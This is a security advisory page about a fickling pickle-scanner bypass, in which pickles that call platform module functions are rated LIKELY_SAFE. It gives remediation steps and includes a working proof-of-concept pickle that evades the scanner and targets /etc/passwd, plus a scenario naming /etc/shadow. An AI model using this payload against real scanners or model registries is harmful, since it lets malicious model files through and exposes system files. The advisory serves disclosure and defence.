GHSA-5cxw-w2xg-2m8h: fickling: Allowlist Bypass evades input filtering

GHSA-5cxw-w2xg-2m8h MEDIUM
Published March 13, 2026
CISO Take

If your ML pipeline uses fickling to gate pickle file safety checks, upgrade to v0.1.10 immediately — all prior versions give a false LIKELY_SAFE verdict for pickles that invoke subprocess or read arbitrary files via the platform module. This is a defense bypass in your security tooling itself, not just a vulnerable library, meaning your pickle safety gate is silent while malicious model files pass through. Patch fickling now and re-scan any pickle artifacts ingested since it was deployed.

Risk Assessment

Medium-High within AI/ML contexts. The raw CVSS is not yet scored, but the operational risk is elevated because fickling is specifically positioned as a security control for detecting malicious pickles — a false negative in a security scanner is categorically worse than a vulnerability in a general-purpose library. Exploitability is moderate: requires crafting a valid pickle using stdlib platform functions, achievable by anyone with Python and pickle knowledge. Impact is constrained (no arbitrary shell injection due to list-based subprocess call), but file existence probing and type disclosure are meaningful in multi-tenant or CI/CD environments where model files are ingested from untrusted sources.

Affected Systems

Package Ecosystem Vulnerable Range Patched
fickling pip <= 0.1.9 0.1.10
620 OpenSSF 7.9 57 dependents Pushed 16d ago 100% patched ~5d to patch Full package profile →

Do you use fickling? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Moderate

Recommended Action

6 steps
  1. PATCH

    Upgrade fickling to v0.1.10 immediately (pip install fickling>=0.1.10).

  2. RE-SCAN: Re-run fickling against all pickle artifacts in your model registry or artifact store ingested since fickling was first deployed.

  3. AUDIT

    Check if any pipeline trusts fickling's LIKELY_SAFE verdict as sole gate — add secondary controls (sandboxed execution, allowlist-only imports, restrictedpickle).

  4. DETECT

    Search pickle files for platform module references (ShortBinUnicode 'platform' followed by StackGlobal opcodes) using fickling's opcode introspection or yara.

  5. COMPENSATING CONTROL

    Until patched, wrap pickle loading in a subprocess sandbox (RestrictedUnpickler pattern) so even bypassing the scanner limits blast radius.

  6. MONITOR

    Alert on subprocess spawning from model-loading processes in prod — a file command invocation from a model server is anomalous.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 9 - Risk management system for high-risk AI
ISO 42001
A.6.2.3 - AI system security testing A.8.4 - AI supply chain management
NIST AI RMF
GOVERN 1.7 - Processes for AI risk identification and mitigation are established MANAGE 2.4 - Residual risks are monitored and managed
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-5cxw-w2xg-2m8h?

If your ML pipeline uses fickling to gate pickle file safety checks, upgrade to v0.1.10 immediately — all prior versions give a false LIKELY_SAFE verdict for pickles that invoke subprocess or read arbitrary files via the platform module. This is a defense bypass in your security tooling itself, not just a vulnerable library, meaning your pickle safety gate is silent while malicious model files pass through. Patch fickling now and re-scan any pickle artifacts ingested since it was deployed.

Is GHSA-5cxw-w2xg-2m8h actively exploited?

No confirmed active exploitation of GHSA-5cxw-w2xg-2m8h has been reported, but organizations should still patch proactively.

How to fix GHSA-5cxw-w2xg-2m8h?

1. PATCH: Upgrade fickling to v0.1.10 immediately (pip install fickling>=0.1.10). 2. RE-SCAN: Re-run fickling against all pickle artifacts in your model registry or artifact store ingested since fickling was first deployed. 3. AUDIT: Check if any pipeline trusts fickling's LIKELY_SAFE verdict as sole gate — add secondary controls (sandboxed execution, allowlist-only imports, restrictedpickle). 4. DETECT: Search pickle files for platform module references (ShortBinUnicode 'platform' followed by StackGlobal opcodes) using fickling's opcode introspection or yara. 5. COMPENSATING CONTROL: Until patched, wrap pickle loading in a subprocess sandbox (RestrictedUnpickler pattern) so even bypassing the scanner limits blast radius. 6. MONITOR: Alert on subprocess spawning from model-loading processes in prod — a file command invocation from a model server is anomalous.

What systems are affected by GHSA-5cxw-w2xg-2m8h?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps pipelines, model registries, data preprocessing pipelines.

What is the CVSS score for GHSA-5cxw-w2xg-2m8h?

No CVSS score has been assigned yet.

Technical Details

NVD Description

# Our assessment We added `platform` to the blocklist of unsafe modules (https://github.com/trailofbits/fickling/commit/351ed4d4242b447c0ffd550bb66b40695f3f9975). It was not possible to inject extra arguments to `file` without first monkey-patching `platform._follow_symlinks` with the pickle, as it always returns an absolute path. We independently hardened it with https://github.com/trailofbits/fickling/commit/b9e690c5a57ee9cd341de947fc6151959f4ae359 to reduce the risk of obtaining direct module references while evading detection. https://github.com/python/cpython/blob/6d1e9ceed3e70ebc39953f5ad4f20702ffa32119/Lib/platform.py#L687-L695 ```python target = _follow_symlinks(target) # "file" output is locale dependent: force the usage of the C locale # to get deterministic behavior. env = dict(os.environ, LC_ALL='C') try: # -b: do not prepend filenames to output lines (brief mode) output = subprocess.check_output(['file', '-b', target], stderr=subprocess.DEVNULL, env=env) ``` # Original report ## Summary A crafted pickle invoking `platform._syscmd_file`, `platform.architecture`, or `platform.libc_ver` passes `check_safety()` with `Severity.LIKELY_SAFE` and zero findings. During `fickling.loads()`, these functions invoke `subprocess.check_output` with attacker-controlled arguments or read arbitrary files from disk. **Clarification:** The subprocess call uses a list argument (`['file', '-b', target]`), not `shell=True`, so the attacker controls the file path argument to the `file` command, not the command itself. The impact is subprocess invocation with attacker-controlled arguments and information disclosure (file type probing), not arbitrary command injection. ## Affected versions `<= 0.1.9` (verified on upstream HEAD as of 2026-03-04) ## Non-duplication check against published Fickling GHSAs No published advisory covers `platform` module false-negative bypass. This follows the same structural pattern as GHSA-5hwf-rc88-82xm (missing modules in `UNSAFE_IMPORTS`) but covers a distinct set of functions. ## Root cause 1. `platform` not in `UNSAFE_IMPORTS` denylist. 2. `OvertlyBadEvals` skips calls imported from stdlib modules. 3. `UnusedVariables` heuristic neutralized by making call result appear used (`SETITEMS` path). ## Reproduction (clean upstream) ```python from unittest.mock import patch import fickling import fickling.fickle as op from fickling.fickle import Pickled from fickling.analysis import check_safety pickled = Pickled([ op.Proto.create(4), op.ShortBinUnicode('platform'), op.ShortBinUnicode('_syscmd_file'), op.StackGlobal(), op.ShortBinUnicode('/etc/passwd'), op.TupleOne(), op.Reduce(), op.Memoize(), op.EmptyDict(), op.ShortBinUnicode('init'), op.ShortBinUnicode('x'), op.SetItem(), op.Mark(), op.ShortBinUnicode('trace'), op.BinGet(0), op.SetItems(), op.Stop(), ]) results = check_safety(pickled) print(results.severity.name, len(results.results)) # LIKELY_SAFE 0 with patch('subprocess.check_output', return_value=b'ASCII text') as mock_sub: fickling.loads(pickled.dumps()) print('subprocess called?', mock_sub.called) # True print('args:', mock_sub.call_args[0]) # (['file', '-b', '/etc/passwd'],) ``` Additional affected functions (same pattern): - `platform.architecture('/etc/passwd')` — calls `_syscmd_file` internally - `platform.libc_ver('/etc/passwd')` — opens and reads arbitrary file contents ## Minimal patch diff ```diff --- a/fickling/fickle.py +++ b/fickling/fickle.py @@ + "platform", ``` ## Validation after patch - Same PoC flips to `LIKELY_OVERTLY_MALICIOUS` - `fickling.loads` raises `UnsafeFileError` - `subprocess.check_output` is not called ## Impact - **False-negative verdict:** `check_safety()` returns `LIKELY_SAFE` with zero findings for a pickle that invokes a subprocess with attacker-controlled arguments. - **Subprocess invocation:** `platform._syscmd_file` calls `subprocess.check_output(['file', '-b', target])` where `target` is attacker-controlled. The `file` command reads file headers and returns type information, enabling file existence and type probing. - **File read:** `platform.libc_ver` opens and reads chunks of an attacker-specified file path.

Exploitation Scenario

An adversary submits a crafted PyTorch or scikit-learn model file to a shared model registry or MLOps platform. The pickle payload invokes platform._syscmd_file('/etc/passwd') or platform.libc_ver('/etc/shadow') via StackGlobal opcodes. The platform security controls include fickling pre-upload scanning — the scanner returns LIKELY_SAFE with zero findings. The model is approved, stored, and later loaded by downstream consumers. Upon loading, the file command is executed with the attacker-controlled path, returning file type metadata (existence confirmation, ASCII/binary classification) via the return value of fickling.loads(). In an exfiltration variant, the attacker chains this with a callback mechanism embedded in the pickle to leak the file content. In a supply chain variant targeting CI/CD, the malicious model file is committed to a model repository, scanned as safe, and deployed to production inference infrastructure.

Timeline

Published
March 13, 2026
Last Modified
March 13, 2026
First Seen
March 24, 2026

Related Vulnerabilities